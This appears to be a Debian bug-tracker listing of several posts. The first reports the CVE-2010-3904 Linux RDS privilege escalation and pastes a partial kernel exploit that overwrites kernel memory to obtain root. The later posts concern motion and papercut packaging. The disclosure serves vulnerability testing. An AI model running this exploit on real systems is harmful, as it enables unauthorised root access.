Bug#600757: Possible Fix
tag 600757 pending thanks It is patch can fix: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation
Package: linux-2.6
Version: 2.6.32-5-686
Severity: critical
Tags: security
Justification: root security hole
There is a security hole in all versions of linux-2.6 distributed by Debian.
The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.
I test it in Debian Squeeze, a screenshot can be found in
http://i56.tinypic.com/2nh19v6.png
--
Juan Angulo Moreno
/*
* Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
* CVE-2010-3904
* by Dan Rosenberg
*
* Copyright 2010 Virtual Security Research, LLC
*
* The handling functions for sending and receiving RDS messages
* use unchecked __copy_*_user_inatomic functions without any
* access checks on user-provided pointers. As a result, by
* passing a kernel address as an iovec base address in recvmsg-style
* calls, a local user can overwrite arbitrary kernel memory, which
* can easily be used to escalate privileges to root. Alternatively,
* an arbitrary kernel read can be performed via sendmsg calls.
*
* This exploit is simple - it resolves a few kernel symbols,
* sets the security_ops to the default structure, then overwrites
* a function pointer (ptrace_traceme) in that structure to point
* to the payload. After triggering the payload, the original
* value is restored. Hard-coding the offset of this function
* pointer is a bit inelegant, but I wanted to keep it simple and
* architecture-independent (i.e. no inline assembly).
*
* The vulnerability is yet another example of why you shouldn't
* allow loading of random packet families unless you actually
* need them.
*
* Greets to spender, kees, taviso, hawkes, team lollerskaters,
* joberheide, bla, sts, and VSR
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT
#define SENDPORT
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf("[*] Could not open socket.\n");
exit(-1);
}
memset(&addr, 0, sizeof(addr));
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
if(ret < 0) {
printf("[*] Could not bind socket.\n");
exit(-1);
}
return s;
}
void get_message(unsigned long address, int sock)
{
recvfrom(sock, (void *)address, sizeof(void *), 0,
NULL, NULL);
}
void send_message(unsigned long value, int sock)
{
int size, ret;
struct sockaddr_in recvaddr;
struct msghdr msg;
struct iovec iov;
unsigned long buf;
memset(&recvaddr, 0, sizeof(recvaddr));
size = sizeof(recvaddr);
recvaddr.sin_port = htons(RECVPORT);
recvaddr.sin_family = AF_INET;
recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
memset(&msg, 0, sizeof(msg));
msg.msg_name = &recvaddr;
msg.msg_namelen = sizeof(recvaddr);
msg.msg_iovlen = 1;
buf = value;
iov.iov_len = sizeof(buf);
iov.iov_base = &buf;
msg.msg_iov = &iov;
ret = sendmsg(sock, &msg, 0);
if(ret < 0) {
printf("[*] Something went wrong sending.\n");
exit(-1);
}
}
void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{
if(!fork()) {
sleep(1);
send_message(value, sendsock);
exit(1);
}
else {
get_message(addr, recvsock);
wait(NULL);
}
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr
Bug#517568: Waiting for sponsorship
Hi, I have uploaded the package to mentors.debian.net (http://mentors.debian.net/debian/pool/main/m/motion/motion_3.2.11-2.dsc) and currently waiting for sponsorship. -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#482231: motion: FTBFS: checking size of short int... configure: error: cannot compute sizeof (short int)
Hi Lucas,
Y build motion 3.2.9-2 in amd64 node with Sid and
they built successfully. You can see the log here:
http://0x29.com.ve/debian/motion/logs/00_checking_size_of_short_int.txt
I use Gcc 4.3:
[EMAIL PROTECTED]:~/pkgs/motion/tmp/motion-3.2.9$ x86_64-linux-gnu-gcc -v
Usando especificaciones internas.
Objetivo: x86_64-linux-gnu
Configurado con: ../src/configure -v --with-pkgversion='Debian 4.3.0-5'
--with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs
--enable-languages=c,c++,fortran,objc,obj-c++ --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
--without-included-gettext
--enable-threads=posix --enable-nls
--with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3
--enable-clocale=gnu --enable-libstdcxx-debug
--enable-objc-gc --enable-mpfr --enable-cld --enable-checking=release
--build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Modelo de hilos: posix
gcc versión 4.3.1 20080523 (prerelease) (Debian 4.3.0-5)
Lucas Nussbaum escribió:
> Package: motion
> Version: 3.2.9-2
> Severity: serious
> User: [EMAIL PROTECTED]
> Usertags: qa-ftbfs-20080520 qa-ftbfs
> Justification: FTBFS on i386
>
> Hi,
>
> During a rebuild of all packages in sid, your package failed to build on
> i386.
>
> This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3
> is now the default on most architectures (even if it's not the case on
> i386 yet). Consequently, many failures are caused by the switch to gcc
> 4.3.
> If you determine that this failure is caused by gcc 4.3, feel free to
> downgrade this bug to 'important' if your package is only built on i386,
> and this bug is specific to gcc 4.3 (i.e the package builds fine with
> gcc 4.2).
>
> Relevant part:
>> /usr/bin/fakeroot debian/rules clean
>> dh_testdir
>> dh_testroot
>> rm -f build-stamp configure-stamp
>> [ ! -f Makefile ] || /usr/bin/make distclean
>> rm -f config.{sub,guess,log,status}
>> dh_clean
>> dpkg-source -b motion-3.2.9
>> dpkg-source: info: using source format `1.0'
>> dpkg-source: info: building motion using existing motion_3.2.9.orig.tar.gz
>> dpkg-source: info: building motion in motion_3.2.9-2.diff.gz
>> dpkg-source: info: building motion in motion_3.2.9-2.dsc
>> debian/rules build
>> dh_testdir
>> cp -f /usr/share/misc/config.guess config.guess
>> cp -f /usr/share/misc/config.sub config.sub
>> # Add here commands to configure the package.
>> CFLAGS="-Wall -g -O2" LDFLAGS="-Wl,--as-needed" ./configure \
>> --prefix=/usr \
>> --bindir=\${prefix}/bin \
>> --build=i486-linux-gnu \
>> --host=i486-linux-gnu \
>> --datadir=\${prefix}/share \
>> --mandir=\${datadir}/man \
>> --infodir=\${datadir}/info \
>> --sysconfdir=/etc/motion \
>> --with-ffmpeg \
>> --with-mysql \
>> --with-pgsql \
>> --without-optimizecpu \
>> --without-jpeg-mmx
>> checking for Darwin... no
>> checking for *BSD... no
>> checking for i486-linux-gnu-gcc... i486-linux-gnu-gcc
>> checking for C compiler default output file name... a.out
>> checking whether the C compiler works... yes
>> checking whether we are cross compiling... no
>> checking for suffix of executables...
>> checking for suffix of object files... o
>> checking whether we are using the GNU C compiler... yes
>> checking whether i486-linux-gnu-gcc accepts -g... yes
>> checking for i486-linux-gnu-gcc option to accept ISO C89... none needed
>> checking for pthread_create in -lpthread... yes
>> checking for libjpeg-mmx... skipping
>> checking for jpeg_set_defaults in -ljpeg... yes
>> checking how to run the C preprocessor... i486-linux-gnu-gcc -E
>> checking for grep that handles long lines and -e... /bin/grep
>> checking for egrep... /bin/grep -E
>> checking for ANSI C header files... yes
>> checking for sys/types.h... yes
>> checking for sys/stat.h... yes
>> checking for stdlib.h... yes
>> checking for string.h... yes
>> checking for memory.h... yes
>> checking for strings.h... yes
>> checking for inttypes.h... yes
>> checking for stdint.h... yes
>> checking for unistd.h... yes
>> checking mjpegtools/jpegutils.h usability... no
>> checking mjpegtools/jpegutils.h presence... no
>> checking for mjpegtools/jpegutils.h... no
>> checking mjpegtools/mjpeg_types.h usability... no
>> checking mjpegtools/mjpeg_types.h presence... no
>> checking for mjpegtools/mjpeg_types.h... no
>> checking mjpegtools... no
>> checking for ffmpeg autodetecting... found for debian
>> checking for ffmpeg headers... found for debian
>> checking file_protocol is defined in ffmpeg ?... no
>> checking for mysql support... testing
>> checking autodect mysql headers... yes
>> checking autodect mysql libs... found
>> checking for PostgreSQL... yes
>> checking for PQcmdTuples in -lpq... no
>> checking for PQoidValue in -lpq... no
>> checking for PQclientEncoding in -lpq..
Bug#462864: Patch
Package: papercut
Version: 0.9.13-4.1
Severity: serious
Tags: patch
Hi,
In the attachment you will find the patch to repair this bug.
--
Juan Angulo Moreno
--- System information. ---
Architecture: i386
Kernel: Linux 2.6.22-3-686
Debian Release: lenny/sid
--- Package information. ---
Depends (Version) | Installed
=-+-===
adduser | 3.105
python| 2.4.4-6
python-support (>= 0.7.1) | 0.7.6
diff -urNp papercut-0.9.13/debian/changelog papercut-0.9.13_new/debian/changelog
--- papercut-0.9.13/debian/changelog 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/changelog 2008-02-21 23:43:53.0 -0430
@@ -1,3 +1,15 @@
+papercut (0.9.13-4.1) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Added debian/papercut.postinst with user/group creation. (Closes: #462864)
+ * Fixed debian/papercut.postrm with delete user support.
+ * Fixed debian/papercut.init (with user daemon support).
+ * Added debian/pyDaemon.py library.
+ * Fixed papercut script with pyDaemon.py.
+ * Fixed .pid file (Its uses the default directory /var/run/papercut).
+
+ -- Juan Angulo Moreno <[EMAIL PROTECTED]> Wed, 20 Feb 2008 03:29:33 -0430
+
papercut (0.9.13-4) unstable; urgency=low
* Switch to the new Python Policy. (Closes: #380886)
diff -urNp papercut-0.9.13/debian/control papercut-0.9.13_new/debian/control
--- papercut-0.9.13/debian/control 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/control 2008-02-21 18:50:45.0 -0430
@@ -2,14 +2,15 @@ Source: papercut
Section: news
Priority: optional
Maintainer: Jérémy Bobbio <[EMAIL PROTECTED]>
-Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3)
+Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3), dpatch
Build-Depends-Indep: python, xsltproc, docbook-xsl
-Standards-Version: 3.7.2
+Standards-Version: 3.7.3
+HomePage: http://pessoal.org/papercut/
XS-Python-Version: current
Package: papercut
Architecture: all
-Depends: ${python:Depends}
+Depends: ${python:Depends}, adduser
XB-Python-Version: ${python:Versions}
Recommends: python-mysqldb, python-pgsql
Suggests: phpbb2, mysql-server
@@ -32,5 +33,3 @@ Description: simple and extensible NNTP
Please note that Papercut is only a NNTP server, not a full-featured news
transport system. It does not handle newsfeeding or other usual news
software features.
- .
- Homepage: http://pessoal.org/papercut/
diff -urNp papercut-0.9.13/debian/copyright papercut-0.9.13_new/debian/copyright
--- papercut-0.9.13/debian/copyright 2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/copyright 2008-02-21 19:20:47.0 -0430
@@ -10,25 +10,47 @@ Changes:
The docs/ directory and its content was removed: IETF RFCs are non-free
in the DFSG sense.
+Files: *
Copyright:
- (c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]>
-
- Permission is hereby granted, free of charge, to any person obtaining a
- copy of this software and associated documentation files (the "Software"),
- to deal in the Software without restriction, including without limitation
- the rights to use, copy, modify, merge, publish, distribute, sublicense,
- and/or sell copies of the Software, and to permit persons to whom the
- Software is furnished to do so, subject to the following conditions:
-
- The above copyright notice and this permission notice shall be included in
- all copies or substantial portions of the Software.
-
- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- SOFTWARE.
+(c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]>
+ Permission is hereby granted, free of charge, to any person obtaining a
+ copy of this software and associated documentation files (the "Software"),
+ to deal in the Software without restriction, including without limitation
+ the rights to use, copy, modify, merge, publish, distribute, sublicense,
+ and/or sell copies of the Software, and to permit persons to whom the
+ Software is furnished to do so, subject to the following conditions:
+
+ The above copyright notice and this permission notice shall be included in
+ all copies or substantial portions of the Software.
+
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVEN
